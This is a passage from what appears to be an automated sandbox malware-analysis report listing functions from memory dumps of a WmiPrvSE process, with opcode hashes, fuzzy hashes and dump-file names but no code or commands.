              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction ID: 3c1a526bc702f3ac6e487c4ffd60c81573845c59faa869f4c8ce8dafcb88c326
              • Opcode Fuzzy Hash: 9ad408c325fcf406a8404d6f0b4c60e7e99a057fde3c63cc35e7e997cc9bb011
              • Instruction Fuzzy Hash: 9101B1B0809A4ECFDB59DB74C5991B93FA0EF14300F4004BFD80AC61A2DE3AA554C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF305F1 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction ID: 1465b850a15641bda26ce31eb996e79eb32dc900809ce8667b1b70952773e030
              • Opcode Fuzzy Hash: cb5a8081e11c311b132fb02a266f12ea776856cdf20ed7057f364959a2cdc15b
              • Instruction Fuzzy Hash: B701B1F0A1960E5FE392EB78C48D5E97BF0EF98300F4104B6D819C32A6DE38E448CA40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301D0 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction ID: 069b4cccae094363012a6a6a6684e3f8abd415e46c7180058975d103bb1b0dbc
              • Opcode Fuzzy Hash: 691dd7c997a1920a780693a6adf794b749ecfe7ac48d2573e0ba71b0eaec6052
              • Instruction Fuzzy Hash: 1B0180B090950D9EDF99EF34C4496FA77A1EF58304F50847AD81EC2290CA76A555CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A4C9 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction ID: 322f89a7e476ec252665fc6bd3fb10f5855d3ea6a0f7f78c7759d23715368fe1
              • Opcode Fuzzy Hash: 454995c5dcad11a80e8ec486d7d937923b6eeecdb0806977f350526481743508
              • Instruction Fuzzy Hash: F20180B090A68D5FDB9ADB74C86D1F97BA0EF19301F4504BFD81AC6192DE26A858C710
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32DD9 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction ID: 32f3c7569826a6b94fc7a90abce857a580fdf14675d03c690c236a46c6e2a211
              • Opcode Fuzzy Hash: dfd23763121217a8bdb28452d71e2c96c3855a327e0bdfe73e95136b403fe9c1
              • Instruction Fuzzy Hash: 940184B181E6495FE753EB34C88D1E97FE0EF59301F0505B6D828C71A3DA29E498C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46C59 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction ID: 35681f044f968552ac901e695ff5c50024824eba6e679b4b6bda17977b86eefb
              • Opcode Fuzzy Hash: bbcb6028d5c29ed38b83c30ab9dd95e1c35f60471702ab53c88bc61043d43b8d
              • Instruction Fuzzy Hash: 21018FB490E64A9FE752EB78C99D1A93FE0EF59301F4508B6D908C70A2EE29E5488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C538 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction ID: 0e2f8f18ac23360e393983e07c83158209a1f0d87791c9458aa7510457987a1f
              • Opcode Fuzzy Hash: de4f5f10964d61ed77a07a8a599f0a5c485faede4a5ae8e75c1cdb5e036b228f
              • Instruction Fuzzy Hash: F201ADF1C1964E9EEB96EE38C8092FE7FE0FF04301F00063AEC28C2291DB3195588690
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4745D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction ID: 283c7cb3d24a6e45c6771420c22b21ad9ca6b3b76e404329fc07596d61933116
              • Opcode Fuzzy Hash: 9bd9b9b061096c92c4341db46104dde305090b896cd3611b242a0cbb285bbdff
              • Instruction Fuzzy Hash: 1E0171B080AA4ECFDB59EF74C5991BA7FA0FF55300F1004BFD80AC61A2DA76A544C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F0 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction ID: af21d0bd5f9d9c8fcfb0a88406959f208265cd4bdca63a67d5eb93058f0161e7
              • Opcode Fuzzy Hash: f496424a3208d43598a5d25826d9a8bd051924254b3310f02843cc0281b66fef
              • Instruction Fuzzy Hash: 5701D6F9D1D55E8AE752AB78D89D1F93AE0EF94301F0505BADA08C2092DB25D44C8680
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3745C Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465442399.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction ID: 9d3790ebf9dc8757ebb36994f171ef174df7dfcce4bd7a7986b26ee6708b1fb9
              • Opcode Fuzzy Hash: e71326f31f57ab75a0d8eb8d2add629c80779605403683d3befc74bf7cd0c5f3
              • Instruction Fuzzy Hash: 2511FAB4D0961A9FDBA6DB28C8847E9B3B4EB58301F1041E6D40DA3385DB399AC9CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF308EF Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3ae933e4b92cd0474ada1164dd82fd05bb063846a3e2906f509275dce77190f8
              • Instruction ID: 06a0ea03d262752b0fded5c2f5851aa842c31b67d5d3696ce3f8542c9297fd1e
              • Opcode Fuzzy Hash: 3ae933e4b92cd0474ada1164dd82fd05bb063846a3e2906f509275dce77190f8
              • Instruction Fuzzy Hash: EC01D6B2D0990D5EEF49EB74C499AE9B7A1FF18310F0541B6C54AD7253CD34B84A8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3332A Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction ID: 0b50dfd67930dfa667680b57ad41c61430372d74ba015c62ba3f0e81beed3a05
              • Opcode Fuzzy Hash: 27eb517ad670b41bafae317b41d6ddc8d2bd54fca1b8a520cb96660d7d68a979
              • Instruction Fuzzy Hash: F6017CB0D1851E9EEB91EB78C48C1F97AE4FF58300F504976D818C62A1EE34E5498740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction ID: 93bcf5b86c5b07b0c1c84102fb41ed88df0eb547a9226d15171d7123a2ef6152
              • Opcode Fuzzy Hash: 6cbba395ca4100df0d6c79f479e1575a8e086d089cb0face0c2b1cf00d1be265
              • Instruction Fuzzy Hash: 1B017CB091A64AAFE752EB78C84D1F97BE0FF59300F4148B6D828C71A2EA35E4488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction ID: e76f702d9b8b35b6fbfb15f762007fa16e91e1108b8f5d8473549d2af67819f7
              • Opcode Fuzzy Hash: 2de0872fee8c06cb323761d3db865a26bc78018a6d8c63e54385347dc168bc62
              • Instruction Fuzzy Hash: 1E019EA0A0E6895EE752EB74885C1E93BF4EF19300F0509F3D818C71A2DA25E4488711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction ID: df85405f4a6b4ae83653ae37308292d2655df50d995d914435237af0423b9b5b
              • Opcode Fuzzy Hash: 38e7fdf234760f1e4d7591f953e863eabc260c92fb0221a75b5cb9432486818a
              • Instruction Fuzzy Hash: 95016DB091590E9AEB59EB34C4582FD77A0FF18305F50087EE82EC6292DF36A555CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction ID: ae36721c1e1e5a11d8a7ae56228bab3b3cbdecd2ce608c069f8dde65acbfaecc
              • Opcode Fuzzy Hash: f204579f7c3866b3b8d6fd86a2a7bac6e4d738061cadadcbce924dfc1fdfff04
              • Instruction Fuzzy Hash: 08016DB0915A1E9EEB59EB74C45D2FA77A0FF18304F50087EE82EC2292DF36A154C610
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF317BD Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction ID: d07dd2e8d708fe105f2b8cfc4ba7108c8bb9e2de4a8a47a0b48c0308c5451dea
              • Opcode Fuzzy Hash: dea6037e0c80028775f196f8ae7fd1e543439a3e0fb540e32a0c991c238d276f
              • Instruction Fuzzy Hash: 9E01D1B080A68D8FDF95DF38C4596FA3BE0FF55301F4440BAE818C2292CA76D854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction ID: 608362499b71376840131e42a17dacda64747ed30c4ffe56e554755a2728b649
              • Opcode Fuzzy Hash: 93ca6cc97806a96c822fd1f3b4bba4d92eaed208e6e70940a8c11863b82cc683
              • Instruction Fuzzy Hash: 69F0F4B1C2954EAAEB669678D80C3FD77E0FB55314F00057BD82DC1581CF7561488241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF301C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction ID: 79b011c8a9aa4595b43cf941916183e0211ad73aa0c7c5de9018791a7a6db254
              • Opcode Fuzzy Hash: 7c6ab97faf5fdd3b63be9db7db0550500b4256c75de7b7a11b231b86c5afb584
              • Instruction Fuzzy Hash: 4DF0AFB080950E9FEF95EE38D4492FA37A4EF15304F40443AE81DC2281CA76E494CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420F8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction ID: b6d215460951bbdc896e465f586d60190c175e86f0d9ac14f6d74974ce3542c0
              • Opcode Fuzzy Hash: 556c3abd86a645c3c8fc4ccdd4d555b239cf90401991ffd588560b9b75425cc0
              • Instruction Fuzzy Hash: 7BF0A4F8C1D55E8AE752AB78C89D1F93AE0EF54300F0104BADA48C2092EB25D4488640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF31448 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 50e2580cf1881077c82994d49f698dcfaabbdb0867900822ce7405adf037edc6
              • Instruction ID: a35c1a6953642c6be8aab61c5dfd6b7cc3c38d53cbe7a7edd2b0f7e273a2c13e
              • Opcode Fuzzy Hash: 50e2580cf1881077c82994d49f698dcfaabbdb0867900822ce7405adf037edc6
              • Instruction Fuzzy Hash: B2F0AFB090950EDBEB11EB68C8489FD73A1FF55311F148235C81AE3392DE39E899CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a8627f3d1ff4fcef268c3211da69cbe36575e0a5120f4b9bdff315ed43792f42
              • Instruction ID: 53e86d1b106cfc81c1915ec1e69b8df0e6d205a696eedf5286a8ae28d8b1a594
              • Opcode Fuzzy Hash: a8627f3d1ff4fcef268c3211da69cbe36575e0a5120f4b9bdff315ed43792f42
              • Instruction Fuzzy Hash: 85F031F1D095199FEB59DA78C0986FC7BB1AF54301F105039D819923C2CA39958DDB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32659 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction ID: fa6a66ff5c634be1dedf620a560b50ae43f78ec94715377de31ac945c7fc2a9e
              • Opcode Fuzzy Hash: 2c250e4244521c6cecf9ae0e26a73c0dd281fd89a43f7f7af439da4c719a39b7
              • Instruction Fuzzy Hash: 38F062B090E3899FE75A9B3488291E93FB0FF16201F4504BEE829C62D3DB699958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46D93 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction ID: 3ea8a4948f299595197ed4065924312948db2af89a313b05769d5a0218247b07
              • Opcode Fuzzy Hash: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction Fuzzy Hash: C5012CB5C0921ACFDF15CFA0D8856FC77B0AF18321F14023AD406A22C0CA396548DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e001394559de42bcfff8b34df60b53fbc8a6b1e4ba5e5968b05620e064b30136
              • Instruction ID: e45c9aee01d2c18a8c67ef01d085d73709e99eb52a726609dd34092c49cf36ed
              • Opcode Fuzzy Hash: e001394559de42bcfff8b34df60b53fbc8a6b1e4ba5e5968b05620e064b30136
              • Instruction Fuzzy Hash: A3F044B0D4A51DDEEB52DB28C489BE9B7B1FF59300F5041A9C41DD3152CB35D9859F40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF326CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction ID: 2e33513bb3c37bb5a75aa1f9e5a265a09d0da8fc2b28aca7a0c87e4b39142664
              • Opcode Fuzzy Hash: 92b96438484aba374e1e7cc483da28433f973e5ce0a021ad6844e9655ab245cc
              • Instruction Fuzzy Hash: 58F0C2B080A38A5FE76A9B34882D2F93AA0FF05200F4004BAE829C5192DB399458C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40580 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction ID: 5a65aed9378fc79d16344d64624a4a81d8a38906c3584f35d85e8ab264fa46b3
              • Opcode Fuzzy Hash: 53f63b81762e5a7e081aff7096d394420d94055aee2e89f251834ecd4b26e74f
              • Instruction Fuzzy Hash: 84F03AB081995E9EEB95EF78C84D6FA76E0FF18300F40093AEC29C2190DB3095548B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF470A4 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd1857dda547edf9c3d452d0acdf68efa47bb4f7c48305539d2506be7c1c8f47
              • Instruction ID: 983de71129a4b72037c9b1acb733e9e71f7042307095d6d5e5862e01c7888fbb
              • Opcode Fuzzy Hash: dd1857dda547edf9c3d452d0acdf68efa47bb4f7c48305539d2506be7c1c8f47
              • Instruction Fuzzy Hash: 8DF0F8B6E0955D8BEF14EBA8D8814FCB7F5EF98350F50003AD509E7292CA29AA45CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF381D5 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465442399.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction ID: 7a987844019845801fc093e3264467b9b143a31b8c01bdc0da03bc793c905526
              • Opcode Fuzzy Hash: fcce33ddaa47779f76a5086490ed36447abe130eb5b013289bed44f0f14737b5
              • Instruction Fuzzy Hash: 2CF0A9F4D0961A9FDBA6DB28C8487F9B7F4AB18301F1001E6941D92382CA399BC99F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF36E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465442399.00007FFBACF35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF35000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf35000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction ID: 1fcbadfaf982311f79caedc1664e4ff340256703b6b2c8908709522c2b33e1a5
              • Opcode Fuzzy Hash: e5088f5da93ebf5594b8c8dd6bb13cf76b259d2ba8076d18426de757a91cae7a
              • Instruction Fuzzy Hash: D0F0FEF4D0961A9FDBA6DB28C8447E9B7F4EB18300F1001E5940DD3342CA349BC59F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43401 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction ID: 9dc311045e26fc69bd3f563dcec1af025cd0c67696bf17ab9d29c570dfb04dee
              • Opcode Fuzzy Hash: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction Fuzzy Hash: 6DE0C270859A0C6BCB11AF69E8482D873B5FB48314F000639D80CD7041D73A9998C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: 6d5fc07cf25d37f0e3624735fd2104bd2d61c0d6a46bcfd1c08da9e1adb468b4
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: ACD0E2B5A0882DCF8F40EFE8D8041ECB3B0FB58301B000032D81DE3240CB20A8148B40
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00007FFBACF407CF Relevance: 5.1, Strings: 4, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
